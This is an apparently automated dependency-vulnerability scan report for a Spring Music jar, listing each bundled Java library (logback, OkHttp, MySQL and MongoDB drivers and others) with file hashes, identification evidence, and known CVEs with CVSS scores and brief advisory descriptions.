spring-music-sqldb-1.0.jar: log4j-to-slf4j-2.10.0.jarDescription:
The Apache Log4j binding between Log4j 2 API and SLF4J. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/log4j-to-slf4j-2.10.0.jar
MD5: 7ac821f6ff3d7f9ed68ffe982a76b8c2
SHA1: f7e631ccf49cfc0aefa4a2a728da7d374c05bd3c
SHA256: b9006337856504a2dd930eb4900ca78d63c13c8a2dd195fc65ca2aa4cfc04850
Evidence Type Source Name Value Confidence Vendor file name log4j-to-slf4j High Vendor jar package name apache Highest Vendor jar package name logging Highest Vendor jar package name slf4j Highest Vendor Manifest automatic-module-name org.apache.logging.slf4j Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.logging.log4j.to-slf4j Medium Vendor Manifest implementation-url https://logging.apache.org/log4j/2.x/log4j-to-slf4j/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest log4jreleasekey B3D8E1BA Low Vendor Manifest log4jreleasemanager Ralph Goers Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid log4j-to-slf4j Low Vendor pom groupid org.apache.logging.log4j Highest Vendor pom name Apache Log4j to SLF4J Adapter High Vendor pom parent-artifactid log4j Low Product file name log4j-to-slf4j High Product jar package name apache Highest Product jar package name logging Highest Product jar package name slf4j Highest Product Manifest automatic-module-name org.apache.logging.slf4j Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache Log4j to SLF4J Adapter Medium Product Manifest bundle-symbolicname org.apache.logging.log4j.to-slf4j Medium Product Manifest Implementation-Title Apache Log4j to SLF4J Adapter High Product Manifest implementation-url https://logging.apache.org/log4j/2.x/log4j-to-slf4j/ Low Product Manifest log4jreleasekey B3D8E1BA Low Product Manifest log4jreleasemanager Ralph Goers Low Product Manifest specification-title Apache Log4j to SLF4J Adapter Medium Product pom artifactid log4j-to-slf4j Highest Product pom groupid org.apache.logging.log4j Highest Product pom name Apache Log4j to SLF4J Adapter High Product pom parent-artifactid log4j Medium Version file version 2.10.0 High Version Manifest Bundle-Version 2.10.0 High Version Manifest Implementation-Version 2.10.0 High Version Manifest log4jreleaseversion 2.10.0 Medium Version pom version 2.10.0 Highest
spring-music-sqldb-1.0.jar: logback-classic-1.2.3.jarDescription:
logback-classic module License:
http://www.eclipse.org/legal/epl-v10.html, http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logback-classic-1.2.3.jar
MD5: 64f7a68f931aed8e5ad8243470440f0b
SHA1: 7c4f3c474fb2c041d8028740440937705ebb473a
SHA256: fb53f8539e7fcb8f093a56e138112056ec1dc809ebb020b59d8a36a5ebac37e0
Evidence Type Source Name Value Confidence Vendor file name logback-classic High Vendor jar package name ch Highest Vendor jar package name classic Highest Vendor jar package name logback Highest Vendor jar package name qos Highest Vendor Manifest bundle-docurl http://www.qos.ch Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname ch.qos.logback.classic Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor pom artifactid logback-classic Low Vendor pom groupid ch.qos.logback Highest Vendor pom name Logback Classic Module High Vendor pom parent-artifactid logback-parent Low Product file name logback-classic High Product jar package name ch Highest Product jar package name classic Highest Product jar package name logback Highest Product jar package name qos Highest Product Manifest bundle-docurl http://www.qos.ch Low Product Manifest Bundle-Name Logback Classic Module Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname ch.qos.logback.classic Medium Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product pom artifactid logback-classic Highest Product pom groupid ch.qos.logback Highest Product pom name Logback Classic Module High Product pom parent-artifactid logback-parent Medium Version file version 1.2.3 High Version Manifest Bundle-Version 1.2.3 High Version pom version 1.2.3 Highest
CVE-2023-6378 suppress
A serialization vulnerability in logback receiver component part of
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service
attack by sending poisoned data.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-42550 suppress
In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (6.6) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:0.7/RC:R/MAV:A CVSSv2:
Base Score: HIGH (8.5) Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C References:
OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data OSSIndex - https://jira.qos.ch/browse/LOGBACK-1591 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY vulnerability@ncsc.ch - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY vulnerability@ncsc.ch - MAILING_LIST,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: logback-core-1.2.3.jarDescription:
logback-core module License:
http://www.eclipse.org/legal/epl-v10.html, http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logback-core-1.2.3.jar
MD5: 841fc80c6edff60d947a3872a2db4d45
SHA1: 864344400c3d4d92dfeb0a305dc87d953677c03c
SHA256: 5946d837fe6f960c02a53eda7a6926ecc3c758bbdd69aa453ee429f858217f22
Evidence Type Source Name Value Confidence Vendor file name logback-core High Vendor jar package name ch Highest Vendor jar package name core Highest Vendor jar package name logback Highest Vendor jar package name qos Highest Vendor Manifest bundle-docurl http://www.qos.ch Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname ch.qos.logback.core Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor pom artifactid logback-core Low Vendor pom groupid ch.qos.logback Highest Vendor pom name Logback Core Module High Vendor pom parent-artifactid logback-parent Low Product file name logback-core High Product jar package name ch Highest Product jar package name core Highest Product jar package name logback Highest Product jar package name qos Highest Product Manifest bundle-docurl http://www.qos.ch Low Product Manifest Bundle-Name Logback Core Module Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname ch.qos.logback.core Medium Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product pom artifactid logback-core Highest Product pom groupid ch.qos.logback Highest Product pom name Logback Core Module High Product pom parent-artifactid logback-parent Medium Version file version 1.2.3 High Version Manifest Bundle-Version 1.2.3 High Version pom version 1.2.3 Highest
CVE-2023-6378 suppress
A serialization vulnerability in logback receiver component part of
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service
attack by sending poisoned data.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-42550 suppress
In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (6.6) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:0.7/RC:R/MAV:A CVSSv2:
Base Score: HIGH (8.5) Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C References:
OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data OSSIndex - https://jira.qos.ch/browse/LOGBACK-1591 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY vulnerability@ncsc.ch - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY vulnerability@ncsc.ch - MAILING_LIST,THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY vulnerability@ncsc.ch - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-12798 (OSSINDEX) suppress
ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core
upto including version 0.1 to 1.3.14 and 1.4.0 to 1.5.12 in Java applications allows
attacker to execute arbitrary code by compromising an existing
logback configuration file or by injecting an environment variable
before program execution.
Malicious logback configuration files can allow the attacker to execute
arbitrary code using the JaninoEventEvaluator extension.
A successful attack requires the user to have write access to a
configuration file. Alternatively, the attacker could inject a malicious
environment variable pointing to a malicious configuration file. In both
cases, the attack requires existing privilege. CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv2:
Base Score: MEDIUM (5.900000095367432) Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:ch.qos.logback:logback-core:1.2.3:*:*:*:*:*:*:* CVE-2024-12801 (OSSINDEX) suppress
Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 0.1 to 1.3.14 and 1.4.0 to 1.5.12 on the Java platform, allows an attacker to
forge requests by compromising logback configuration files in XML.
The attacks involves the modification of DOCTYPE declaration in XML configuration files.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-12801 for details CWE-918 Server-Side Request Forgery (SSRF)
CVSSv2:
Base Score: LOW (2.4000000953674316) Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:ch.qos.logback:logback-core:1.2.3:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: logging-interceptor-3.3.1.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logging-interceptor-3.3.1.jarMD5: 9145e870f51a770ad15221862d11d4f5SHA1: 99ce730034c6f5aaed710d1e0e9df95e8714ed5fSHA256: f1c50344a874d5c532b41d09a025acee1e6743b55e007f832d619bc2f552fc3d
Evidence Type Source Name Value Confidence Vendor file name logging-interceptor High Vendor jar package name logging Highest Vendor jar package name logging Low Vendor jar package name okhttp3 Highest Vendor jar package name okhttp3 Low Vendor pom artifactid logging-interceptor Low Vendor pom groupid com.squareup.okhttp3 Highest Vendor pom name OkHttp Logging Interceptor High Vendor pom parent-artifactid parent Low Product file name logging-interceptor High Product jar package name logging Highest Product jar package name logging Low Product jar package name okhttp3 Highest Product pom artifactid logging-interceptor Highest Product pom groupid com.squareup.okhttp3 Highest Product pom name OkHttp Logging Interceptor High Product pom parent-artifactid parent Medium Version file version 3.3.1 High Version pom version 3.3.1 Highest
CVE-2018-20200 suppress
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this is a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967 CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
CVE-2023-0833 suppress
A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: mail-1.4.7.jarDescription:
JavaMail API (compat) License:
http://www.sun.com/cddl, https://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mail-1.4.7.jar
MD5: 77f53ff0c78ba43c4812ecc9f53e20f8
SHA1: 9add058589d5d85adeb625859bf2c5eeaaedf12d
SHA256: 78c33b4f7c7b60f4b680f2d2405b1f063d71929cf1a4fbc328888379f365fcfb
Evidence Type Source Name Value Confidence Vendor file name mail High Vendor jar package name javax Highest Vendor jar package name mail Highest Vendor jar package name provider Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.mail Medium Vendor Manifest extension-name javax.mail Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest originally-created-by 1.7.0_15 (Oracle Corporation) Low Vendor Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid mail Low Vendor pom groupid javax.mail Highest Vendor pom name JavaMail API (compat) High Vendor pom parent-artifactid all Low Vendor pom parent-groupid com.sun.mail Medium Product file name mail High Product jar package name javax Highest Product jar package name mail Highest Product jar package name provider Highest Product jar package name sun Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaMail API (compat) Medium Product Manifest bundle-symbolicname javax.mail Medium Product Manifest extension-name javax.mail Medium Product Manifest Implementation-Title javax.mail High Product Manifest originally-created-by 1.7.0_15 (Oracle Corporation) Low Product Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Product Manifest specification-title JavaMail(TM) API Design Specification Medium Product pom artifactid mail Highest Product pom groupid javax.mail Highest Product pom name JavaMail API (compat) High Product pom parent-artifactid all Medium Product pom parent-groupid com.sun.mail Medium Version file version 1.4.7 High Version Manifest Bundle-Version 1.4.7 High Version Manifest Implementation-Version 1.4.7 High Version pom version 1.4.7 Highest
spring-music-sqldb-1.0.jar: micrometer-core-1.0.3.jarDescription:
Application monitoring instrumentation facade License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/micrometer-core-1.0.3.jar
MD5: b65e5df7bd88e359261f31785cced9d9
SHA1: 8234fa7ea2b2d6f7147209dcaaa7cd347951d5eb
SHA256: 0fa2584a2dde6a270ca76e7eb9f87d97759f2e8b722a7f8925ab0efe67d58c32
Evidence Type Source Name Value Confidence Vendor central artifactid micrometer-core Highest Vendor central groupid io.micrometer Highest Vendor file name micrometer-core High Vendor jar package name core Low Vendor jar package name io Low Vendor jar package name micrometer Low Vendor Manifest branch 1.0.x Low Vendor Manifest build-date 2018-04-04_16:09:50 Low Vendor Manifest build-host Jons-MBP Low Vendor Manifest build-job LOCAL Low Vendor Manifest build-number LOCAL Low Vendor Manifest built-os Mac OS X Low Vendor Manifest built-status integration Low Vendor Manifest change 3d0f1fd Low Vendor Manifest module-email jschneider@pivotal.io Low Vendor Manifest module-origin micrometer-metrics/micrometer.git Low Vendor Manifest module-owner jschneider@pivotal.io Low Vendor Manifest module-source /micrometer-core Low Vendor pom artifactid micrometer-core Low Vendor pom developer email jschneider@pivotal.io Low Vendor pom developer id jkschneider Medium Vendor pom developer name Jon Schneider Medium Vendor pom groupid io.micrometer Highest Vendor pom name micrometer-core High Vendor pom url micrometer-metrics/micrometer Highest Product central artifactid micrometer-core Highest Product file name micrometer-core High Product jar package name core Highest Product jar package name core Low Product jar package name instrument Low Product jar package name io Highest Product jar package name micrometer Highest Product jar package name micrometer Low Product Manifest branch 1.0.x Low Product Manifest build-date 2018-04-04_16:09:50 Low Product Manifest build-host Jons-MBP Low Product Manifest build-job LOCAL Low Product Manifest build-number LOCAL Low Product Manifest built-os Mac OS X Low Product Manifest built-status integration Low Product Manifest change 3d0f1fd Low Product Manifest Implementation-Title io.micrometer#micrometer-core;1.0.3 High Product Manifest module-email jschneider@pivotal.io Low Product Manifest module-origin micrometer-metrics/micrometer.git Low Product Manifest module-owner jschneider@pivotal.io Low Product Manifest module-source /micrometer-core Low Product pom artifactid micrometer-core Highest Product pom developer email jschneider@pivotal.io Low Product pom developer id jkschneider Low Product pom developer name Jon Schneider Low Product pom groupid io.micrometer Highest Product pom name micrometer-core High Product pom url micrometer-metrics/micrometer High Version central version 1.0.3 Highest Version file version 1.0.3 High Version Manifest Implementation-Version 1.0.3 High Version pom version 1.0.3 Highest
spring-music-sqldb-1.0.jar: mongodb-driver-3.6.3.jarDescription:
The MongoDB Driver License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mongodb-driver-3.6.3.jar
MD5: 887cd075b7f8fab34bd7462eab23b8d4
SHA1: d462fcc4640ac69b35e7cd2491e992c6bdf82862
SHA256: 05742d826498d5f2223a9919c615a682571c42f99cad85e80429107ccea8c2c7
Evidence Type Source Name Value Confidence Vendor central artifactid mongodb-driver Highest Vendor central groupid org.mongodb Highest Vendor file name mongodb-driver High Vendor jar package name mongodb Low Vendor pom artifactid mongodb-driver Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Driver High Vendor pom url http://www.mongodb.org Highest Product central artifactid mongodb-driver Highest Product file name mongodb-driver High Product pom artifactid mongodb-driver Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Driver High Product pom url http://www.mongodb.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version pom version 3.6.3 Highest
CVE-2021-20328 (OSSINDEX) suppress
Specific versions of the Java driver that support client-side field level encryption (CSFLE) fail to perform correct host name verification on the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Java driver and the KMS service rendering Field Level Encryption ineffective. This issue was discovered during internal testing and affects all versions of the Java driver that support CSFLE. The Java async, Scala, and reactive streams drivers are not impacted. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services originating from applications residing inside the AWS, GCP, and Azure network fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption. CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (6.800000190734863) Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.mongodb:mongodb-driver:3.6.3:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: mongodb-driver-core-3.6.3.jarDescription:
The Java operations layer for the MongoDB Java Driver. Third parties can ' +
'wrap this layer to provide custom higher-level APIs License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mongodb-driver-core-3.6.3.jar
MD5: be30b055e73fd7aa5dbab12b8eaee509
SHA1: f2c41ad5349cdb65a6f7bde16f5ebae9a0dbe5f5
SHA256: 7de0b300c3687eeca77d76e6af42ee336880a4b6e08bf33d2bcbaa3c8f98af2f
Evidence Type Source Name Value Confidence Vendor central artifactid mongodb-driver-core Highest Vendor central groupid org.mongodb Highest Vendor file name mongodb-driver-core High Vendor jar package name mongodb Highest Vendor jar package name mongodb Low Vendor Manifest bundle-symbolicname org.mongodb.driver-core Medium Vendor pom artifactid mongodb-driver-core Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Java Driver Core High Vendor pom url http://www.mongodb.org Highest Product central artifactid mongodb-driver-core Highest Product file name mongodb-driver-core High Product jar package name mongodb Highest Product Manifest Bundle-Name mongodb-driver-core Medium Product Manifest bundle-symbolicname org.mongodb.driver-core Medium Product pom artifactid mongodb-driver-core Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Java Driver Core High Product pom url http://www.mongodb.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version Manifest build-version 3.6.3 Medium Version Manifest Bundle-Version 3.6.3 High Version pom version 3.6.3 Highest
spring-music-sqldb-1.0.jar: mssql-jdbc-6.2.2.jre8.jarDescription:
Microsoft JDBC Driver for SQL Server.
The Azure Key Vault feature in Microsoft JDBC Driver for SQL Server depends on
Azure SDK for JAVA and Azure Active Directory Library For Java.
License:
MIT License: http://www.opensource.org/licenses/mit-license.php File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mssql-jdbc-6.2.2.jre8.jar
MD5: 7422706ded326cc60b222d99e698d437
SHA1: a9ee2b0234f623f49fad888550011035b99d0861
SHA256: 4ff4ff2fc61008a9c51bd16de7150d3d4f18dd628ca5e6b85c03d4e470b1644d
Evidence Type Source Name Value Confidence Vendor file name mssql-jdbc High Vendor jar package name jdbc Highest Vendor jar package name microsoft Highest Vendor jar package name sql Highest Vendor jar package name sqlserver Highest Vendor Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Vendor pom artifactid mssql-jdbc Low Vendor pom developer org Microsoft Medium Vendor pom developer org URL http://www.microsoft.com Medium Vendor pom groupid com.microsoft.sqlserver Highest Vendor pom name Microsoft JDBC Driver for SQL Server High Vendor pom organization name Microsoft Corporation High Vendor pom url Microsoft/mssql-jdbc Highest Product file name mssql-jdbc High Product jar package name jdbc Highest Product jar package name microsoft Highest Product jar package name sql Highest Product jar package name sqlserver Highest Product Manifest Bundle-Name Microsoft JDBC Driver for SQL Server Medium Product Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Product pom artifactid mssql-jdbc Highest Product pom developer org Microsoft Low Product pom developer org URL http://www.microsoft.com Low Product pom groupid com.microsoft.sqlserver Highest Product pom name Microsoft JDBC Driver for SQL Server High Product pom organization name Microsoft Corporation Low Product pom url Microsoft/mssql-jdbc High Version file version 6.2.2.jre8 High Version Manifest Bundle-Version 6.2.2.jre8 High Version pom version 6.2.2.jre8 Highest
spring-music-sqldb-1.0.jar: mysql-connector-java-5.1.46.jarDescription:
MySQL JDBC Type 4 driver License:
The GNU General Public License, Version 2: http://www.gnu.org/licenses/old-licenses/gpl-2.0.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/mysql-connector-java-5.1.46.jar
MD5: eeacff7cadb9b49e4c3cc6d2f4246088
SHA1: 9a3e63b387e376364211e96827bc27db8d7a92e9
SHA256: 3122089761e6403f02e8a81ed4a2d65a2e1029734651ba00f2ea92d920ff7b1e
Evidence Type Source Name Value Confidence Vendor central artifactid mysql-connector-java Highest Vendor central groupid mysql Highest Vendor file name mysql-connector-java High Vendor jar package name jdbc Highest Vendor jar package name jdbc Low Vendor jar package name mysql Highest Vendor jar package name mysql Low Vendor Manifest bundle-symbolicname com.mysql.jdbc Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.mysql Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid mysql-connector-java Low Vendor pom groupid mysql Highest Vendor pom name MySQL Connector/J High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com Medium Vendor pom url http://dev.mysql.com/doc/connector-j/en/ Highest Product central artifactid mysql-connector-java Highest Product file name mysql-connector-java High Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name jdbc Low Product jar package name mysql Highest Product Manifest Bundle-Name Oracle Corporation's JDBC Driver for MySQL Medium Product Manifest bundle-symbolicname com.mysql.jdbc Medium Product Manifest Implementation-Title MySQL Connector Java High Product Manifest specification-title JDBC Medium Product pom artifactid mysql-connector-java Highest Product pom groupid mysql Highest Product pom name MySQL Connector/J High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com Low Product pom url http://dev.mysql.com/doc/connector-j/en/ Medium Version central version 5.1.46 Highest Version file version 5.1.46 High Version Manifest Bundle-Version 5.1.46 High Version Manifest Implementation-Version 5.1.46 High Version pom version 5.1.46 Highest
CVE-2018-3258 (OSSINDEX) suppress
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). CWE-noinfo
CVSSv3:
Base Score: HIGH (8.800000190734863) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:mysql:mysql-connector-java:5.1.46:*:*:*:*:*:*:* CVE-2023-22102 suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.1.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H). CWE-284 Improper Access Control, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (8.3) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/E:1.6/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-2692 suppress
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 8.0.15 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H). NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H/E:0.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:L/AC:H/Au:S/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2022-21363 (OSSINDEX) suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). CWE-noinfo
CVSSv2:
Base Score: MEDIUM (6.0) Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P References:
